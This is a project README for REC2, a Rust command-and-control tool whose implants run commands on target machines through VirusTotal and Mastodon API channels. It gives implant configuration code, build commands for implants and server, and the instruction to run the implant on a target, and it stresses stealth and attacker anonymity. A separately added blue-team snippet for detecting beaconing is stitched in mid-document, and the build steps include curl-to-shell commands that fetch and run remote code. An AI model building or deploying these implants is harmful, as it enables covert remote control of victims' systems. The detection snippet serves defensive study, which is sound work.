
REC2 (Rusty External Command and Control) is a client and server tool, written in Rust, that allows an auditor to execute commands through the VirusTotal and Mastodon APIs. 🦀


g0h4n/REC2


:shipit: Information: REC2 is an old personal project (early 2023) that I didn't continue development on. It's part of a list of projects that helped me to learn Rust. The code is probably considered obsolete and not in its best form. Maybe I'll pick up where I left off (#roadmap). However, REC2 is fully functional and allows executing commands on a Linux / macOS or Windows target from the VirusTotal and Mastodon APIs.

REC2 (Rusty External C2)


⚠️ Disclaimer: REC2 is for educational purposes only. Use this at your own discretion, I cannot be held responsible for any damages caused. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and am not responsible for any misuse or damage caused by this tool.

🔴 Redteamer: I share with you a beta version of one of my external C2 using VirusTotal and Mastodon

🔵 Blueteamer: You can find an example of YARA rules for REC2 implants in this same repo

🧮 Summary

🏷️ Description

REC2, or Rusty External Command and Control, is a versatile Command and Control (C2) tool developed in the Rust programming language. It provides a discreet and effective means to manage remote implants (clients) on macOS, Linux, and Windows systems. REC2 utilizes third-party APIs like VirusTotal or Mastodon to transmit encrypted messages using AES between the server and implants, allowing attackers to operate stealthily through these external channels. Implants can monitor pending jobs, retrieve, decrypt, execute tasks on the target system, and securely transmit results back via the same APIs. Using these APIs as intermediaries adds an extra layer of anonymization, reducing the ease of tracing back to the attacker.

schema
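For the blue-team side of the channel described above, here is an added detection example that is not part of the REC2 repository: it scans web-proxy log lines for an internal host that contacts a VirusTotal or Mastodon host at near-constant intervals, as an implant polling for pending jobs would. The log format, the host names (including the `mastodon.example` placeholder), the assumption of regular polling, and the thresholds are all assumptions made for this example.

```rust
use std::collections::BTreeMap;
// Constructed sample proxy log, one request per line: "<epoch_secs> <client> <dest_host>".
const SAMPLE_LOG: &str = "\
1700000000 ws-042 www.virustotal.com
1700000007 ws-017 www.virustotal.com
1700000015 ws-017 www.virustotal.com
1700000060 ws-042 www.virustotal.com
1700000090 ws-003 mastodon.example
1700000121 ws-042 www.virustotal.com
1700000130 ws-042 intranet.example
1700000180 ws-042 www.virustotal.com
1700000240 ws-042 www.virustotal.com
1700000400 ws-017 www.virustotal.com
1700001900 ws-017 www.virustotal.com
not a log line";

// Services the page names as relay channels; the Mastodon host is a placeholder.
const WATCHED: [&str; 2] = ["www.virustotal.com", "mastodon.example"];

/// Returns (client, dest, mean gap in seconds) for every pair with at least `min_hits`
/// requests whose gaps all stay within `max_jitter` (a fraction) of the mean gap.
pub fn find_beacons(log: &str, min_hits: usize, max_jitter: f64) -> Vec<(String, String, f64)> {
    let mut seen: BTreeMap<(String, String), Vec<u64>> = BTreeMap::new();
    for line in log.lines() {
        let f: Vec<&str> = line.split_whitespace().collect();
        if f.len() != 3 { continue; } // skip malformed lines
        let Ok(ts) = f[0].parse::<u64>() else { continue };
        if WATCHED.contains(&f[2]) {
            seen.entry((f[1].to_string(), f[2].to_string())).or_default().push(ts);
        }
    }
    let mut hits = Vec::new();
    for ((client, dest), mut times) in seen {
        if times.len() < min_hits { continue; } // too few requests to judge periodicity
        times.sort_unstable();
        let gaps: Vec<f64> = times.windows(2).map(|w| (w[1] - w[0]) as f64).collect();
        let mean = gaps.iter().sum::<f64>() / gaps.len() as f64;
        if mean > 0.0 && gaps.iter().all(|g| (g - mean).abs() <= max_jitter * mean) {
            hits.push((client, dest, mean));
        }
    }
    hits
}

fn main() {
    for (client, dest, mean) in find_beacons(SAMPLE_LOG, 4, 0.1) {
        println!("possible beacon: {client} -> {dest} every ~{mean:.0}s");
    }
}
```

In the constructed log only `ws-042` is reported: `ws-017` also reaches VirusTotal four times, but at irregular intervals typical of manual lookups.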

📺 Usage and Demo

[Demo: server | client.exe]

Change some values in implants/(mastodon,virustotal)/src/main.rs:

```rust
// (MASTODON or VIRUSTOTAL) TOKEN
// <https://mastodon.be/settings/applications>
// <https://developers.virustotal.com/reference/authentication>
let token = lc!("TOKEN").to_owned();
// (MASTODON or VIRUSTOTAL) FULL URL
//let full_url = lc!("https://mastodon.xx/@username/100123451234512345").to_owned();
let full_url = lc!("https://www.virustotal.com/gui/file/99ff0b679081cdca00eb27c5be5fd9428f1a7cf781cc438b937cf8baf8551c4d").to_owned();
```

Make the Windows x64 implant static binary:

```bash
make virustotal_windows
make mastodon_windows
```

You can find (rec2_virustotal_x64.exe or rec2_mastodon_x64.exe) in your current directory.

And to finish, compile the server binary:

```bash
make c2server_release
./server_release -h
./server_release VirusTotal -h
./server_release Mastodon -h
# Example
./server_release VirusTotal --url <URL> --token <TOKEN> --key <AES_KEY>
```

Now you just need to execute the implant on your target.

🚜 How to compile it?

Using Makefile

You can use the make command to compile it for Linux, Windows or macOS.

More commands in the Makefile:

```
REC2 Server:
usage: make c2server_debug
usage: make c2server_release
usage: make c2server_windows
usage: make c2server_windows_x64
usage: make c2server_windows_x86
usage: make c2server_linux
usage: make c2server_linux_aarch64
usage: make c2server_linux_x86_64
usage: make c2server_macos
usage: make c2server_arm_musl
usage: make c2server_armv7

VirusTotal implant:
usage: make virustotal_debug
usage: make virustotal_release
usage: make virustotal_windows
usage: make virustotal_windows_x64
usage: make virustotal_windows_x86
usage: make virustotal_linux
usage: make virustotal_linux_aarch64
usage: make virustotal_linux_x86_64
usage: make virustotal_macos
usage: make virustotal_arm_musl
usage: make virustotal_armv7

Mastodon implant:
usage: make mastodon_debug
usage: make mastodon_release
usage: make mastodon_windows
usage: make mastodon_windows_x64
usage: make mastodon_windows_x86
usage: make mastodon_linux
usage: make mastodon_linux_aarch64
usage: make mastodon_linux_x86_64
usage: make mastodon_macos
usage: make mastodon_arm_musl
usage: make mastodon_armv7

Dependencies:
usage: make install_windows_deps
usage: make install_macos_deps

Documentation:
usage: make c2server_doc
usage: make virustotal_doc
usage: make mastodon_doc

Cleaning:
usage: make clean
```

Using Dockerfile

Build REC2 with Docker to make sure you have all dependencies.

```bash
# Build the image; the trailing "." is the build context (the repository root)
docker build --rm -t rec2 .

# Then to build C2 server:
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_windows
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_linux
docker run --rm -v ./:/usr/src/rec2 rec2 c2server_macos

# Then to build VirusTotal implant:
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_windows
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_linux
docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_macos

# Then to build Mastodon implant:
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_windows
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_linux
docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_macos
```

Using Cargo

You will need to install Rust on your system.

https://www.rust-lang.org/fr/tools/install

:warning: You need to export the LITCRYPT_ENCRYPT_KEY variable in your terminal before compiling (it is used for implant string obfuscation).

```bash
export LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"
LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"
```

:warning: You need to change AESKEY in implants/(virustotal,mastodon)/main.rs and change the URL and TOKEN.

Here is how to compile the "release" and "debug" versions using the cargo command.

```bash
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choose your implant: Mastodon or VirusTotal

# implants/mastodon/Cargo.toml
# release version
cargo build --release --manifest-path implants/mastodon/Cargo.toml
# or debug version
cargo b --manifest-path implants/mastodon/Cargo.toml

# implants/virustotal/Cargo.toml
# release version
cargo build --release --manifest-path implants/virustotal/Cargo.toml
# or debug version
cargo b --manifest-path implants/virustotal/Cargo.toml

# Server
cargo build --release --manifest-path server/Cargo.toml
# or debug version
cargo b --manifest-path server/Cargo.toml
```

The implants result can be found in the implants/(mastodon,virustotal)/target/release or in the implants/(mastodon,virustotal)/target/debug folder. The server result can be found in the server/target/release or in the server/target/debug folder.

Below you can find the compilation methodology for each of the OS from Linux. If you need another compilation system, please consult the list in this link: https://doc.rust-lang.org/nightly/rustc/platform-support.html

Manually for Linux x86_64 static version

```bash
# Install rustup and Cargo for Linux
curl https://sh.rustup.rs -sSf | sh

# Add Linux deps
rustup install stable-x86_64-unknown-linux-gnu
rustup target add x86_64-unknown-linux-gnu

# Static compilation for Linux
git clone https://github.com/g0h4n/REC2
cd REC2

# The variables are set as a prefix on the cargo command line so that they
# are passed to cargo's environment.

# Implants
# choose your implant: Mastodon or VirusTotal
# implants/mastodon/Cargo.toml
CFLAGS="-lrt" LDFLAGS="-lrt" RUSTFLAGS='-C target-feature=+crt-static' cargo build --release --target x86_64-unknown-linux-gnu --manifest-path implants/mastodon/Cargo.toml
# implants/virustotal/Cargo.toml
CFLAGS="-lrt" LDFLAGS="-lrt" RUSTFLAGS='-C target-feature=+crt-static' cargo build --release --target x86_64-unknown-linux-gnu --manifest-path implants/virustotal/Cargo.toml

# Server
CFLAGS="-lrt" LDFLAGS="-lrt" RUSTFLAGS='-C target-feature=+crt-static' cargo build --release --target x86_64-unknown-linux-gnu --manifest-path server/Cargo.toml
```

The result can be found in the implants/(mastodon,virustotal)/target/x86_64-unknown-linux-gnu/release or in the server/target/x86_64-unknown-linux-gnu/release folder.

Manually for Windows static version from Linux

```bash
# Install rustup and Cargo in Linux
curl https://sh.rustup.rs -sSf | sh

# Add Windows deps
rustup install stable-x86_64-pc-windows-gnu
rustup target add x86_64-pc-windows-gnu

# Static compilation for Windows
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choose your implant: Mastodon or VirusTotal
# implants/mastodon/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path implants/mastodon/Cargo.toml
# implants/virustotal/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path implants/virustotal/Cargo.toml

# Server
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path server/Cargo.toml
```

The result can be found in the implants/(mastodon,virustotal)/target/x86_64-pc-windows-gnu/release or in the server/target/x86_64-pc-windows-gnu/release folder.

Manually for macOS static version from Linux

Amazing documentation: https://wapl.es/rust/2019/02/17/rust-cross-compile-linux-to-macos.html

```bash
# Install rustup and Cargo in Linux
curl https://sh.rustup.rs -sSf | sh

# Add macOS tool chain
sudo git clone https://github.com/tpoechtrager/osxcross /usr/local/bin/osxcross
sudo wget -P /usr/local/bin/osxcross/ -nc https://s3.dockerproject.org/darwin/v2/MacOSX10.10.sdk.tar.xz && sudo mv /usr/local/bin/osxcross/MacOSX10.10.sdk.tar.xz /usr/local/bin/osxcross/tarballs/
sudo UNATTENDED=yes OSX_VERSION_MIN=10.7 /usr/local/bin/osxcross/build.sh
sudo chmod 775 /usr/local/bin/osxcross/ -R
export PATH="/usr/local/bin/osxcross/target/bin:$PATH"

# Cargo needs to be told to use the correct linker for the x86_64-apple-darwin target, so add the following to your project’s .cargo/config file:
grep 'target.x86_64-apple-darwin' ~/.cargo/config || echo "[target.x86_64-apple-darwin]" >> ~/.cargo/config
grep 'linker = "x86_64-apple-darwin14-clang"' ~/.cargo/config || echo 'linker = "x86_64-apple-darwin14-clang"' >> ~/.cargo/config
grep 'ar = "x86_64-apple-darwin14-clang"' ~/.cargo/config || echo 'ar = "x86_64-apple-darwin14-clang"' >> ~/.cargo/config

# Static compilation for macOS
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choose your implant: Mastodon or VirusTotal
# implants/mastodon/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path implants/mastodon/Cargo.toml
# implants/virustotal/Cargo.toml
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path implants/virustotal/Cargo.toml

# Server
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path server/Cargo.toml
```

The result can be found in the implants/(mastodon,virustotal)/target/x86_64-apple-darwin/release folder.

How to build the documentation?

```bash
git clone https://github.com/g0h4n/REC2
cd REC2

# Implants
# choose your implant: Mastodon or VirusTotal
# implants/mastodon/Cargo.toml
cargo doc --open --no-deps --manifest-path implants/mastodon/Cargo.toml
# implants/virustotal/Cargo.toml
cargo doc --open --no-deps --manifest-path implants/virustotal/Cargo.toml

# Server
cargo doc --open --no-deps --manifest-path server/Cargo.toml
```

🚦 Roadmap

🔗 Links
